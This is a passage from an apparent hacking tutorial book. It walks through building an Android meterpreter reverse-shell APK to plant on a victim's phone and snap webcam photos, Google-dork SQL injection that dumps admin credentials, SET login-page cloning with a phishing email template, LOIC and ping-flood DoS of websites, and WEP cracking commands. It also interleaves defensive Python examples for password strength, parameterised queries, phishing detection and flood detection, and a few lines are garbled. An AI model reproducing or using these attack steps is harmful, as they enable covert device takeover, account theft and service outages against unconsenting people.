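# Constructed sample wordlist standing in for a dictionary file such as passwd.lst.
SAMPLE_WORDLIST = {"admin", "password", "1234", "letmein", "dlink", "secret"}

# Assumed offline guess rate (guesses per second); real rates depend on the
# file format / hash and on the hardware, so treat this as a tunable parameter.
ASSUMED_GUESSES_PER_SECOND = 1_000_000


def keyspace(charset_size, min_len, max_len):
    """Number of candidates a brute force must cover for lengths min_len..max_len
    over a charset of charset_size symbols (what `fcrackzip -b -c a -l 1-6` walks)."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def charset_size_of(password):
    """Size of the union of the standard character classes the password draws from."""
    size = 0
    if any(c in string.ascii_lowercase for c in password):
        size += len(string.ascii_lowercase)   # 26
    if any(c in string.ascii_uppercase for c in password):
        size += len(string.ascii_uppercase)   # 26
    if any(c in string.digits for c in password):
        size += len(string.digits)            # 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)       # 32
    return size


def worst_case_seconds(password, rate=ASSUMED_GUESSES_PER_SECOND):
    """Seconds to exhaust every candidate up to the password's length and charset."""
    return keyspace(charset_size_of(password), 1, len(password)) / rate


def assess(password, wordlist=SAMPLE_WORDLIST, rate=ASSUMED_GUESSES_PER_SECOND):
    """Classify a password the way the two attacks above would experience it:
    'dictionary' if a wordlist run finds it immediately, otherwise by brute-force time."""
    if password.lower() in wordlist:
        return "dictionary"
    secs = worst_case_seconds(password, rate)
    if secs < 24 * 3600:            # assumed threshold: exhausted within a day
        return "weak"
    if secs < 365 * 24 * 3600:      # assumed threshold: exhausted within a year
        return "moderate"
    return "strong"


if __name__ == "__main__":
    for pw in ("admin", "abcdef", "abcdefgh", "correct-Horse-7-battery"):
        print(f"{pw!r}: {assess(pw)} (worst case {worst_case_seconds(pw):,.0f} s)")
```

The lesson for your own router or archive is the one the numbers make obvious: a password that is in a common wordlist falls to hydra's first pass regardless of length, and a six-letter lowercase one is a few minutes of brute force, not years.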

Doing some Scripting in BT

Here I want you to get a bit familiar with Backtrack scripting. What I want to do is show you the possibilities in Backtrack.

1. Run Backtrack to the desktop and run the terminal.

2. Type in:

gedit

3. Type this in gedit and when you're finished save it as hacker:

#!/bin/bash

echo "I'm a hacker who does things for educational purposes only and nothing more."

4. Let's go back to the terminal and type:

chmod u+x hacker

./hacker

5. Once we are this far, it's time to run the script to see what it looks like. To do so we must be in the same folder where we created the script. I saved mine in the root folder. (see Figure 5-8)

Figure 5-8 shows you how the script is running in the terminal.

Backtrack was revolutionized to Kali

Backtrack 6 was never going to come out with new features. But apparently the same coders and people who created Backtrack re-created it with new features and named it Kali. Still, many people gave it other names like Backtrack Six or Reborn of Backtrack. But in the end the name was changed because it had too many new features.

Key features

Everything is the same as Backtrack, so it will be very easy for you to get used to it. The only difference is that it has more tools and features, like:

* Kali supports many more chipsets for wireless devices compared to Backtrack 5.

* Kali no longer has a pentest directory for you to launch your applications from. The new way does not require you to navigate into a directory. All you have to do is type in the name of the application in the terminal from any location. If you're not familiar with the names you can still navigate with the GUI menu.

* Kali runs on smartphones and tablets with no problem.

* With Kali, compared to Backtrack, it won't be needed.

Which one should I use?

That was not a fair question; Kali is simply a newer version of Backtrack. It's simply a matter of preference which one to use, rather than facts or references. Both of them offer the same magnitude of hacking tools and both are similar.

Hack in Smartphones

I will be using Kali to plant a backdoor seed inside a smartphone so you can later do Metasploiting with it. It just takes a couple of seconds to do this and it's fun. I tested mine on my Android device and it worked like a charm.

1. First off, run Kali to the desktop and run the terminal.

2. I will use this command: msfpayload android/meterpreter/reverse_tcp lhost=[your ip] lport=[port that you want to use] R > /root/Desktop/files.apk, so in my case I would type:

msfpayload android/meterpreter/reverse_tcp lhost=192.168.2.17 lport=8080 R > /root/Desktop/files.apk

3. Now we have created an apk file that was stored on my desktop. Open another terminal and type in:

msfconsole

4. Since we will do things remotely we need to configure Kali for this, so type in:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.2.17

set lport 8080

exploit

5. OK, now we are ready. Now you'll have to figure out a way to have the victim download files.apk to his/her phone or tablet. Just find a free web host or share it in your Dropbox. I'll just leave it to your imagination.

6. Once it's downloaded and opened on the phone you can start playing in his/her phone. We will first list the files on the phone by typing:

ls

7. To view what apps are running you can type in:

ps

8. And now let's take some pictures from the cam by typing:

webcam_snap 1

A tip: to view the available cams you should type webcam_list.

That should list all the cams on the device and is helpful when choosing between 1 or 2 with the webcam_snap [number] command. (see Figure 5-8)

Figure 5-8 shows you how the script is running in the terminal.

Small summary ahead

Backtrack/Kali is an operating system that is made to do penetration testing.

With Backtrack you can find the router password and username.

Metasploit is a great way for computer penetration in the LAN and also smartphones.

Backtrack can be used for breaking passwords of compressed files.


Chapter 6 Website Hacking

We will cover:

History of SQL injection

Understanding SQL injection

Simple SQL-injection

Introduction to Phishing

Performing Phishing

Sometimes you may want to hack your own website that you made to see how it goes. Or maybe a friend or a client asked you to test his website to see if it's vulnerable, and website hacking might come in handy.

History of SQL injection

The language SEQUEL was developed by the IBM corporation. Relational Software, which is now known as Oracle, introduced a great implementation of SQL in 1979. After many tests, it was available to start using between 1979 and 1983.

From that language people started implementing malicious code, and one of them was SQL injection to attack websites and applications. SQL injection was considered to be one of the top 10 vulnerabilities of 2007 and 2010, and in 2013 it was the number one attack method.

Understanding SQL-injection

SQL injection is used to gain entry to the database from the available public entry points. SQL injection commands are filled in the form instead of the normal account login. Once the SQL commands reach the database they can also pinpoint the other databases on the same server. Suitable sites to hack with SQL injection are contact forms, feedback fields, shopping carts and many more. Most of the fields allow for SQL commands.

Necessary things

Whether a business can be hacked depends on these factors: size of the business, age, update status, patches of the applications and the number of staff. It depends on what you are about to attack and on whether your tools are well designed.

Types of SQL injection attacks

* Authentication Bypass

* Information Disclosure

* Compromised Data Integrity

* Compromised Availability of Data

* Remote Command Execution

Simple SQL-injection

SQL injection can be used in contact forms, feedback fields, shopping carts and many more. Most of the fields allow for SQL commands. But nowadays it's really difficult to do an SQL injection on some sites, because most of them come really tightly protected from SQL injection.

Doing a SQL-injection

1. First off, go to Google.com. There you will search for vulnerable sites. To find them, type one of these keywords:

inurl:pageid=

inurl:index.php?id=

inurl:/login.php

2. Once you have searched one of those keywords in Google you will find a list of possibly vulnerable sites. Your task will be to visit these sites one by one to check their vulnerability.

3. When you're inside, add a single quote at the end of the site URL and hit Enter. For example:

http://www.testing_site.com/index.php?id=2'

If the page remained the same or showed "page not found", it means the site is not vulnerable.

And if you got an error message like this one, it means that site is vulnerable:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line

4. Awesome, you found a website that is vulnerable. Now we will need to find the number of columns present in the target database. For that, replace the single quote (') with an order by 1, order by 2, order by 3, order by 4,5,6,7 statement.

For example:

http://www.testing_site.com/index.php?id=2 order by 1

http://www.testing_site.com/index.php?id=2 order by 2

http://www.testing_site.com/index.php?id=2 order by 3

http://www.testing_site.com/index.php?id=2 order by 4

Keep trying each time until you get an error like "unknown column".

In case the above method fails to work for you, then try to add "--" at the end of the statement.

http://www.testing_site.com/index.php?id=2 order by 1--

http://www.testing_site.com/index.php?id=2 order by 2--

http://www.testing_site.com/index.php?id=2 order by 3--

http://www.testing_site.com/index.php?id=2 order by 4--

http://www.testing_site.com/index.php?id=2 order by 5--

5. Finding the vulnerable columns

Now let's find the vulnerable column by trying the query "union select columns_sequence".

6. Now change the id value to negative (id=-2). It's time to replace the column sequence from 1 to x-1, separated with commas (,):

http://www.testing_site.com/index.php?id=-2 union select 1,2,3,4,5,6,7

When this code is executed you will retrace the vulnerable column. There you have it: columns 3 and 7 are vulnerable. Let's take the vulnerable column 3 first.

7. Replace column 3 in the query with version().

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7

This should display the version, for example 5.0.1 or 4.3.

8. Change version() to database() and user() to find the database and the user respectively.

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7

If nothing happens or it went wrong, try this one:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7

9. We are almost done. All that we have to do now is find the table name.

To do that we will have to replace the 3 with group_concat(table_name) and add from information_schema.tables where table_schema=database()

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()

10. Now this will show you a list of table names. It's up to you to find the table name which is related to the user or admin.

11. Now you need to replace group_concat(table_name) with group_concat(column_name).

12. Also replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--"

And we have to change the table name to a MySQL CHAR() string.

13. It would be great if you could install the HackBar addon right now. (see Figure 6-1)

Figure 6-1. Here I'm showing how it will look when you're about to download the addon.

Once it's installed there will be a toolbar. Press F9 to show/hide it. (see Figure 6-2)

Figure 6-2. Here the HackBar is in action, ready to start hacking.

14. We go to SQL->MySQL->MySQL CHAR() inside the HackBar.

This will ask for the string that we want to convert to MySQL CHAR(). Now what we have to do is type the code at the end of the URL instead of "mysqlchar".

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)

15. Now you are supposed to see the list of columns.

For example:

admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

16. Next, replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2)

17. Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name"

For example:

http://www.testing_site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin

18. It's supposed to show the data stored in the database, depending on the column name. If all of these queries give an error message then try some other column names from the list.

19. Now it's time to try one of these URL links for finding the login page:

http://www.testing_site.com/admin.php

http://www.testing_site.com/admin/

http://www.testing_site.com/admin.html

http://www.testing_site.com:2082/

After a few tries with failures, you will wind up inside the administrator page using these URL examples.
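The single-quote and order by probes in steps 3 and 4 only give a signal because the id parameter is pasted straight into the SQL text. The Python/sqlite3 snippet below is an added example, not code from the book: it models such an index.php?id= handler beside a parameterised version, runs the same probes against both, and reports what the manual test would observe. The table, its rows and the probe strings are constructed, and sqlite's error wording differs from MySQL's, but the behaviour the steps rely on is the same.

```python
import sqlite3


def make_db():
    """Constructed sample database: a 'pages' table like the one behind index.php?id=."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                     [(1, "Home", "welcome"), (2, "About", "who we are")])
    return conn


def lookup_vulnerable(conn, page_id):
    """String concatenation: whatever follows id= becomes part of the SQL statement,
    so 2' breaks the syntax and 2 order by 9 errors on the column count."""
    sql = "SELECT title, body FROM pages WHERE id = " + page_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, page_id):
    """Hardened form: validate the type, then bind the value as a parameter.
    The driver sends the value separately from the statement, so it can never
    change the query's structure."""
    try:
        pid = int(page_id)
    except ValueError:
        return []                     # reject non-numeric ids outright
    return conn.execute("SELECT title, body FROM pages WHERE id = ?", (pid,)).fetchall()


def probe(lookup, page_id):
    """Report what the chapter's manual probe would observe: 'error', 'rows' or 'empty'."""
    conn = make_db()
    try:
        rows = lookup(conn, page_id)
    except sqlite3.Error:             # the database error page the chapter looks for
        return "error"
    finally:
        conn.close()
    return "rows" if rows else "empty"


# The probes from steps 3 and 4, as constructed inputs.
PROBES = ["2", "2'", "2 order by 1", "2 order by 9"]


def compare():
    """Side-by-side results for each probe: {probe: (vulnerable, safe)}."""
    return {p: (probe(lookup_vulnerable, p), probe(lookup_safe, p)) for p in PROBES}


if __name__ == "__main__":
    for p, (vuln, safe) in compare().items():
        print(f"id={p!r:<16} vulnerable: {vuln:<6} safe: {safe}")
```

Against the vulnerable lookup the probes behave exactly as the steps describe (a quote gives an error, order by 1 succeeds, a too-large order by fails), which is what the "column counting" reads off. Against the parameterised lookup every malformed id is simply an empty result, so there is nothing to enumerate; that, together with not echoing database errors to the browser, is the fix a site owner applies.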

Introduction to Phishing

Phishing is a method of hacking into people's accounts by sending them an email that looks legitimate, with the purpose of retrieving the recipient's financial information. Most of the time the messages look like they come from a trustworthy website. These emails might look like they are coming from an online banking site, a social network site or an online shopping site.

One of the most common ways to fool a victim is by lying in the message that there has been fraudulent activity on the victim's account. And at the bottom you might put "click here to verify your information".

Whaling

This type of phishing is specifically directed at high-ranking persons inside a business or organization.

Spear phishing

This one is focused on any people who have some connection with the organization.

Performing Phishing

Here I'm about to show you how you can hack any social network account or email account or even a bank account by using the phishing method to retrieve the user's account information.

Phishing actually consists of this process, which I call Manual Phishing:

1. Copy the login page

2. Search for the code line inside the source code

3. Make some changes inside the code

4. Create a free hosting account. Most of the time your account gets suspended, because it's against the rules to have a phishing site online

5. Upload the fake login page you created to the hosting site

6. Send a fake email to your victim

7. Then, last but not least, retrieve the information the victim entered

But this can actually consume time and some work, which is saving the index.html file to the computer and then uploading it to a web server, and it doesn't always work. So I found a way that is much more exciting and easy in Backtrack (not installed in a virtual machine, but either booted from a live CD or fully installed on your hard disk, or else it won't work). I call it Automated Phishing:

1. First run Backtrack to the desktop and run the terminal.

2. To read your IP address, type:

ifconfig

3. Next let's go into the pentest directory by typing:

cd /pentest/exploits/set

4. Now that we are in the folder, type in:

./set

(Y to agree to the terms)

5. Select 1 for Social-Engineering Attacks.

6. Now we choose 2 to select Website Attack Vectors.

7. We now select 4 for Tabnabbing Attack Method.

8. We now select 2 for Site Cloner.

9. Enter the IP of the machine you're using, which you saw earlier.

10. In this step you will have to enter the name of the site you want to make a phishing page of. It could again be ANY social network site or email site, for example: http://www.ffthesocialnetwork_or_emailsite.com/

11. After a few moments of waiting it asks you to press Return, so do it, and afterwards press Enter. (see Figure 6-3)

Figure 6-3. It will look like this when it's ready to initiate.

12. Now what actually happened is that your IP address has turned into your phishing page link.

13. The next step is to make your IP shorter. To do so we go to http://goo.gl/, paste our link and click on Shorten URL. (see Figure 6-4)

Figure 6-4. This is the Google URL shortener in action.

14. And there you have it; test the link to see if it works. Now you need to either email the link or message the link to a friend who can handle this prank, or to yourself for educational purposes.

15. Now when the ID and the password are entered you'll receive the email and password in your terminal. (So leave the terminal open and don't restart the PC until it's in, otherwise the IP might change.)

Writing the Email

Now your website is ready; the only thing that is missing is to write your fake email with your link inside it. Take a moment to analyze this fake letter.

Dear Customer

We regret to inform you that we had to lock your account access because we have reasons to believe that it may have been compromised by outside parties.

In order to protect your sensitive information, we temporarily suspended your account access.

Click here to verify and reactivate your account access by completing the secure form that will appear. This security measure will ensure that you are the only person with access to the account. Thank you for your time and consideration in this matter.

Please do not reply to this message

For any inquiries, contact Customer Service.

As you can see here, the guy who wrote this did a bit of research on the victim's life or personal information before writing this phishing mail. And that's exactly what phishing is all about. Don't try this at home.
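Read from the receiving side, the letter above carries every classic tell at once: a generic greeting, fear and urgency wording, a "do not reply" line, and (after step 13) a shortened link that hides where "click here" really goes. The following Python checker is an added example that is not from the book; it scores a raw message on those tells. The sample messages, the trusted-domain list, the shortener list and the phrase list are all constructed assumptions, and a real mail filter would draw them from the organisation's own data.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the chapter's letter given a From header and a goo.gl link.
SAMPLE_MAIL = """From: Customer Service <security@examplebank-support.example>
Subject: Your account access has been locked

Dear Customer

We regret to inform you that we had to lock your account access because we have
reasons to believe that it may have been compromised by outside parties.

In order to protect your sensitive information, we temporarily suspended your
account access.

Click here to verify and reactivate your account access: http://goo.gl/x1y2z3

Please do not reply to this message
"""

# Constructed benign message from the same (assumed) organisation, for contrast.
BENIGN_MAIL = """From: Alice <alice@examplebank.example>
Subject: Lunch

Hi Bob, see you at noon. Menu: https://www.examplebank.example/cafeteria
"""

# Assumed reference data; replace with your own lists.
TRUSTED_DOMAINS = ("examplebank.example",)
SHORTENERS = {"goo.gl", "bit.ly", "tinyurl.com", "t.co"}
URGENCY_PHRASES = ("lock your account", "suspended", "verify", "reactivate", "compromised")


def _trusted(host):
    return any(host == d or host.endswith("." + d) for d in TRUSTED_DOMAINS)


def phishing_indicators(raw):
    """Return the list of red flags found in a raw message (headers, blank line, body)."""
    flags = []
    headers, _, body = raw.partition("\n\n")
    body_l = body.lower()

    # 1. Sender domain: look-alike domains are the usual trick.
    m = re.search(r"^From:.*@([\w.-]+)", headers, re.M)
    sender = m.group(1).lower() if m else ""
    if sender and not _trusted(sender):
        flags.append(f"sender domain not trusted: {sender}")

    # 2. Links: shorteners hide the destination; other hosts are simply external.
    for url in re.findall(r"https?://[^\s<>\"']+", body):
        host = (urlparse(url).hostname or "").lower()
        if host in SHORTENERS:
            flags.append(f"shortened link hides destination: {url}")
        elif not _trusted(host):
            flags.append(f"link to external host: {host}")

    # 3. Wording: fear/urgency, generic greeting, and "do not reply".
    hits = [p for p in URGENCY_PHRASES if p in body_l]
    if len(hits) >= 2:
        flags.append("urgency/fear language: " + ", ".join(hits))
    if re.search(r"^dear (customer|user|member)\b", body_l, re.M):
        flags.append("generic greeting instead of the account holder's name")
    if "do not reply" in body_l:
        flags.append("discourages replying to the sender")
    return flags


def risk_score(raw):
    """Number of indicators; in practice you would weight them and set a threshold."""
    return len(phishing_indicators(raw))


if __name__ == "__main__":
    for name, mail in (("sample", SAMPLE_MAIL), ("benign", BENIGN_MAIL)):
        print(name, risk_score(mail), phishing_indicators(mail))
```

The same checks are what a user can do by hand: look at the real sender domain, hover the link before clicking, and treat "your account is locked, click to verify" as a reason to type the bank's address yourself rather than follow the message.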

Small summary ahead

* SQL injection is used to gain entry to the database from the available public entry points.

* SQL injection targets are contact forms, feedback fields, shopping carts and many more. Most of the fields allow for SQL commands.

* Phishing is a method of hacking into people's accounts by sending them an email that looks legitimate, with the purpose of retrieving the recipient's financial information.

* There are two types of phishing: Whaling and Spear Phishing.


Chapter 7 Denial of Service in Depth

We will cover:

* What is Denial of Service

* How DoS works

* Building a DoS attack

* DoS on the DNS

Did you ever like to crush things when you were a kid? And when you got older things went digital and it was impossible to do so? Now here I will present DoS itself right in front of you, to make your old dream come true again.

What is Denial of Service

DDoS: Distributed Denial of Service. A DDoS attack is a malicious attempt to make a server or a network unreachable for the client, usually by temporarily making it slow or taking down the services of a host.

Specific DoS Attack Types:

* UDP Flood

* ICMP Flood

* Ping of Death

* Slowloris

* Zero-day DDoS

How DoS works

A lot of people might be thinking that DDoS is about cracking the security or changing private information. For example, an email Denial of Service attack is not about hacking the user's email but about preventing him from checking, receiving or sending mail. It works, as you already might have guessed, by sending masses and masses of requests continuously.

And with this the service/server becomes either slow or crashes. What's really happening is either that the system can't figure out which packets are real or not, and even if it does, it slows the system's capacity to handle all of them in time.

Limitations of DoS

These days the services are really strong and clever. For example, the service might be getting many good packets from many other devices while there is one device that is sending many more packets than one normally does. What happens is that the attack gets stopped.

Sometimes, even when the DDoS manages to put the service/server down, it goes back up after a few moments.

Another one: if you only have one attacker attacking a website and that website has so much traffic on it, it would be almost impossible, because so many people are sending their packets and that gets in your way and would interfere with everything.

Building a DoS Attack

The first thing you need is to find a service that you can target, something with open ports for example. Services that support open connections, like:

* Web servers

* Email servers

* DNS servers

Also connections that don't have a limit. To find out that it has no limit, send packets to see how much it can hold. Send a lot of email attachments into their system. And let's say you don't have a specific target; you can just flood it like we would do, but it takes more flooding and more connections to do it.

Setting up the tools

1. I will be using Advanced Port Scanner for this exercise. I found mine for free on Google; go ahead, take a look, download it and install it. (see Figure 7-1)

Figure 7-1. Here is Advanced Port Scanner in the installation process.

It scans the network and shows you all the machines that are on the network. Here, on my network, I found a machine with a server and with its open ports. (see Figure 7-2)

Figure 7-2. Advanced Port Scanner is here in action scanning ports.

2. OK, so now that we have the system (router) and the port, I'll be setting up the second tool, called Low Orbit Ion Cannon (LOIC). It's open source software and can be downloaded at: sourceforge.net/projects/loic/ (see Figure 7-3)

Figure 7-3. This is how LOIC looks when it's running.

3. And now in the IP field I'm going to fill in the IP of the server I found. After that, click on Lock on.

4. Fill in the port field with the port you found.

5. Also change the method field to TCP. And click on IMMA CHARGIN MAH LAZER to mount the attack; the Requested counter will quickly start increasing.

With this the server could either start getting slower by using up many resources, or it's defending itself from this kind of attack.

6. Now if you click Stop, change the port to another open port, drag the slider in the TCP/UDP message area to make it slow to confuse the server from defending itself, and hit IMMA CHARGIN MAH LAZER again.

Now it's up to you to set up a few computers, maybe eight or ten, with LOIC installed on them doing the same thing on the same port.

After a few moments of flooding, try pinging the router in cmd. If you get Request Timed Out, that means the router might be down.

DoS On a DNS

DNS is actually an IP address simplified into words and letters, which makes it easy for someone to use instead of an IP address, for example www.test.com. Here I will show you how to DDoS any website using their DNS. As complicated as it may sound, all that it really takes is some knowledge on how to work with CMD.

1. OK, so now run the Windows that you're using. I'll be using Windows 7. Run Notepad.

2. In Notepad write down these couple of lines:

color a

title DDOS sitename.com

ping www.sitename.com -t -l 20000

3. Save this text file as a .BAT file.

4. And now go to the folder where you saved the file and run this file multiple times. You'll end up with many CMD windows pinging (flooding) the site.

Sometimes it may give you "Request timed out", but that's not a big deal.

But if it keeps giving you "Request timed out" and no reply from the site at all, that means the site is really big and difficult to put down, or you really need some powerful computers with good PCs to get some replies.

Here I'll be showing you: I have 160 bat files open and running, and that's it! (see Figure 7-4)

Figure 7-4. Here I'm showing you how I have 156 cmd windows open, DDoSing my website.

5. Don't close the command prompts; leave them working for an hour or even more (the bigger the site, the more time it takes). While the command prompts are running, keep refreshing the site to see if it's still up, and eventually after a few moments it will be down.

A tip to make sure the site goes down, and faster, is to do this trick of opening many command prompts on multiple computers. The more computers you have, the better.
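From the receiving end, what the section above describes (many windows each running ping -t with a 20000-byte payload) is easy to pick out: one source address sending ICMP far faster than anyone legitimately pings, with echo requests far larger than a normal 32- or 64-byte ping. The detector below is an added example, not code from the book; it runs over a constructed firewall-style log and flags sources by rate and by size. The log format, the addresses and the thresholds are assumptions, and the "Limitations of DoS" section is exactly this check, automated: a single loud source stands out against normal traffic.

```python
from collections import defaultdict


def constructed_log():
    """Constructed sample log, one packet per line: 'epoch src dst proto bytes'.
    10.0.0.5 pings normally; 10.0.0.9 replays the chapter's `ping -t -l 20000`
    from many windows at once (200 oversized echoes in five seconds)."""
    lines = [f"{1700000000 + i * 2} 10.0.0.5 10.0.0.1 ICMP 60" for i in range(3)]
    lines += [f"{1700000000 + i // 40} 10.0.0.9 10.0.0.1 ICMP 20028" for i in range(200)]
    lines.append("1700000003 10.0.0.7 10.0.0.1 TCP 1500")   # unrelated traffic, ignored
    return lines


def parse(line):
    ts, src, dst, proto, size = line.split()
    return int(ts), src, dst, proto, int(size)


def find_icmp_floods(lines, window=10, max_pkts_per_window=50, max_bytes=1500):
    """Map each suspicious source to sorted reasons.

    'rate'           - more than max_pkts_per_window ICMP packets from one source
                       inside one fixed window of `window` seconds
    'oversized echo' - an ICMP packet larger than max_bytes, which no ordinary
                       ping sends and which (above the MTU) forces fragmentation
    Thresholds are assumptions; tune them to your own baseline traffic."""
    per_window = defaultdict(int)      # (src, window_start) -> packet count
    reasons = defaultdict(set)
    for ts, src, _dst, proto, size in map(parse, lines):
        if proto != "ICMP":
            continue
        per_window[(src, ts - ts % window)] += 1
        if size > max_bytes:
            reasons[src].add("oversized echo")
    for (src, _start), count in per_window.items():
        if count > max_pkts_per_window:
            reasons[src].add("rate")
    return {src: sorted(r) for src, r in reasons.items()}


if __name__ == "__main__":
    for src, why in find_icmp_floods(constructed_log()).items():
        print(f"{src}: {', '.join(why)}")
```

Once a source is flagged this way, the usual response is to rate-limit or drop ICMP echo from it at the edge (or to rate-limit echo replies globally), which is why the batch-file flood in the text tends to produce "Request timed out" against any host that is properly configured.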

Small summary ahead

* A DDoS attack is a malicious attempt to make a server or a network unreachable for the client, usually by temporarily making it slow or taking down the services of a host.

* Sometimes, even when the DDoS manages to put the service/server down, it goes back up after a few moments.

* When you are about to DoS something, find a network with open ports.

* Advanced Port Scanner is software for port scanning in the network.

* DNS is actually an IP address simplified into words and letters.


Chapter 8 Wireless hack

We will cover:

* How security wifi is encrypted

* Tools to crack a wifi

* Cracking WEP wireless password

* Cracking WPA/WPA2 wireless password

* Cracking wifi password in Windows

* Bypassing MAC Address filter

Sometimes you might end up with many wireless connections and have no access to them because they are encrypted with password protection; now this can be a pain in the ass. In this chapter I'll teach you how to find the wifi password with no hard work.

How security wifi is encrypted

Wi-Fi has had many encryption technologies. The first encryption, WEP, was easy to get hacked into. But then later came WPA and WPA2.

WEP (Wired Equivalent Privacy)

This is the encryption that was used mostly in all countries over the world in past years. But it turned out that WEP encryption was really vulnerable and was cracked using free software. In 2004 the Wi-Fi Alliance retired WEP.

WPA (Wi-Fi Protected Access)

WPA was a complete replacement for WEP. What was new in this encryption was the message integrity check. What this does is detect whether an attacker has captured and tampered with packets between the client and the access point. And the strong configuration was later superseded by the Advanced Encryption Standard (AES). But soon after that WPA also turned out to be vulnerable protection.

WPA2 (Wi-Fi Protected Access 2)

Because WPA turned out to be vulnerable after all, WPA2 came in with CCMP. This encryption is almost impossible to crack. But if you really want to break into WPA2, all it takes is the same technique used for WPA, which could take from two to fourteen hours.
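The three sections above give the order of preference a defender should enforce on their own networks: open and WEP are broken, WPA/TKIP is weak, and WPA2 with CCMP is the baseline, with WPS (the PIN mechanism reaver attacks later in this chapter) switched off. The Python audit below is an added example that is not from the book: it rates each network in a constructed scan listing and says what to fix. The listing format is made up, the WPS column is an assumption, and the two BSSIDs from the chapter's exercises are reused only as sample values.

```python
# Constructed sample scan, one network per line:
#   BSSID CHANNEL ENC CIPHER AUTH WPS ESSID
# (the first two BSSIDs are the ones used in this chapter's own exercises;
# the WPS column is assumed, real scanners report it in their own way).
SAMPLE_SCAN = """\
00:05:5D:EC:AA:52 6 WEP WEP OPN no darkknight
70:19:70:5A:63:26 1 WPA2 CCMP PSK yes dlink
AA:BB:CC:DD:EE:01 11 WPA TKIP PSK no oldrouter
AA:BB:CC:DD:EE:02 11 OPN - - no cafe-free
AA:BB:CC:DD:EE:03 36 WPA2 CCMP PSK no home
"""


def parse_scan(text):
    """Turn the listing into dicts; the ESSID is everything after the sixth field."""
    nets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        bssid, ch, enc, cipher, auth, wps, essid = line.split(None, 6)
        nets.append({"bssid": bssid, "channel": int(ch), "enc": enc,
                     "cipher": cipher, "auth": auth, "wps": wps == "yes",
                     "essid": essid})
    return nets


def rate(net):
    """Return (severity, advice) for one network, following the chapter's own history:
    open/WEP are broken, WPA/TKIP is weak, WPA2 with WPS on exposes the PIN attack,
    WPA2/CCMP with WPS off is the acceptable baseline."""
    if net["enc"] == "OPN":
        return "critical", "no encryption; anyone in range can read the traffic"
    if net["enc"] == "WEP":
        return "critical", "WEP, retired in 2004 and recoverable from captured traffic"
    if net["enc"] == "WPA" or net["cipher"] == "TKIP":
        return "high", "WPA/TKIP; move to WPA2 with CCMP (AES)"
    if net["wps"]:
        return "medium", "WPS enabled; its PIN can be guessed offline, disable it"
    return "ok", "WPA2/CCMP with WPS off; keep a long, non-dictionary passphrase"


def audit(text):
    """{essid: severity} for every network in the listing."""
    return {n["essid"]: rate(n)[0] for n in parse_scan(text)}


if __name__ == "__main__":
    for n in parse_scan(SAMPLE_SCAN):
        sev, why = rate(n)
        print(f"{n['essid']:<12} {n['bssid']} {sev:<8} {why}")
```

Run against your own access points, anything rated critical or high is a configuration change away from safe; the medium case is the one most people miss, because a WPA2 network with a strong passphrase is still only as strong as its WPS PIN while WPS is on.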

Tools to crack a wifi

There are various tools out there to help with wifi hacking, but today I'll show you the most popular ones, commonly used every day in every single moment of the hacking life.

The tools

* Backtrack

* Airmon-ng

* Commview

* Compatible wifi card

The biggest requirement that you'll need is a good wireless adapter, or else you're done for. It has to be a good adapter that receives packets really fluently. Below I will show you the adapters I found useful for this exercise.

Cracking WEP wireless password

In this exercise we will start first with WEP encryption hacking.

1. First run Backtrack to the desktop and open the terminal.

2. To get a list of the network interfaces type in (see Figure 8-1):

airmon-ng

Figure 8-1. With this you can see all the wireless interfaces listed.

3. Here you can see I have a wlan0.

4. The next step would be to do airmon-ng start (interface), so I would type:

airmon-ng start wlan0

5. Now to find the networks in the area and pick one we will be using airodump-ng (interface). So I type:

airodump-ng mon0

6. Hit Ctrl+C to stop the list when you have found the wifi you want to hack. (see Figure 8-2)

Figure 8-2. Here I have all the wifi in the area listed.

7. Now we are going to see what's going on in that network and capture packets from it to a file using airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface), so in my case I type in:

airodump-ng -c 6 -w darkknight --bssid 00:05:5D:EC:AA:52 mon0

8. Now leave that terminal open and run another terminal; we will use this command: aireplay-ng -1 0 -a (bssid) mon0

So I type in:

aireplay-ng -1 0 -a 00:05:5D:EC:AA:52 mon0

9. Now this time we will start getting the mass of packets that we need by using aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. So I will type in:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:05:5D:EC:AA:52 mon0

Choose y for yes. And with that Backtrack will start collecting masses and masses of packets this time; leave it working for a while.

10. Once you think you've got enough packets, maybe after 5 to 6 hours or even more, open a third terminal and type (the file prefix is the one given to -w in step 7):

aircrack-ng darkknight*.cap

And there it should display the found password. (see Figure 8-3)

Figure 8-3. Here you can see the password of my own wifi that I found during the test.

Cracking WPA/WPA2 Wireless Pass

In this exercise we will continue with WPA/WPA2 passwords, to hack into WPA/WPA2 encryption.

1. Open BackTrack to the desktop and run two terminals.

2. In the 1st terminal type in:

    airmon-ng

And the interface will come up.

3. So type in:

    airmon-ng start wlan0

